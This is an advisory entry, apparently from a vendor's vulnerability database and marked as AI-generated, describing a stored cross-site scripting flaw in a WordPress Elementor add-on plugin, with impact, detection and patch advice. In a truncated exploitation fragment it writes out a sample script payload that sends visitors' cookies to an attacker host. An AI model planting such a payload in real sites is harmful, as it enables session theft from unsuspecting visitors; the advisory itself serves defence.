
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-6916 is a Stored Cross-Site Scripting (XSS) vulnerability in the Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets & Templates for WordPress plugin. It affects all versions up to and including 3.1.0, and is caused by insufficient input sanitization and output escaping of the sg_content_number_prefix parameter. The vulnerability was published on May 2, 2026, and carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS flaw in the Fun Fact widget's sg_content_number_prefix parameter. The vulnerable code paths are located in class/elements/views/class-fun-fact-view.php (line 71), class/elements/elementor/class-fun-fact-elementor.php (line 24), and lib/jeg-element/includes/class/elements/class-elements-view-abstract.php (line 251), where user-supplied input is rendered without proper sanitization or escaping (GitHub Advisory). An authenticated attacker with at minimum contributor-level WordPress access can inject a malicious script payload into the parameter, which is then persistently stored and executed in the browser of any user who visits the affected page (Wordfence).
Successful exploitation allows authenticated contributors to persistently inject arbitrary JavaScript into WordPress pages, which executes in the context of any visitor's browser. This can lead to session token theft, credential harvesting, redirection to malicious sites, or unauthorized actions performed on behalf of compromised users, including site administrators. While availability is not directly impacted, both confidentiality and integrity are affected, with a scope change indicating the injected scripts can impact users beyond the attacker's own session (GitHub Advisory, Wordfence).
No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation at this time (Wordfence). The EPSS score is approximately 0.016–0.021%, placing it in the lower percentiles for near-term exploitation likelihood (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities.
sg_content_number_prefix parameter to a crafted XSS payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>, and save or publish the page.<script> tags or encoded JavaScript in the sg_content_number_prefix field.wp_posts table) containing obfuscated or encoded script tags associated with Fun Fact widget parameters.Update the Jeg Kit for Elementor plugin to a version newer than 3.1.0, which contains the patch addressing this vulnerability (GitHub Advisory, Wordfence). As interim measures, restrict contributor-level and above access to only trusted users, and deploy a Web Application Firewall (WAF) capable of detecting and blocking XSS payloads. Audit any pages created or modified using the Fun Fact widget by untrusted contributor accounts for signs of injected scripts (Wordfence).
Wordfence included CVE-2026-6916 in its weekly WordPress vulnerability report for the period of April 27–May 3, 2026, noting the patch availability (Wordfence Blog). Sucuri also referenced the vulnerability in its May 2026 vulnerability patch roundup (Sucuri Blog). General community reaction has been routine for a medium-severity WordPress plugin XSS, with no notable controversy or widespread alarm.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."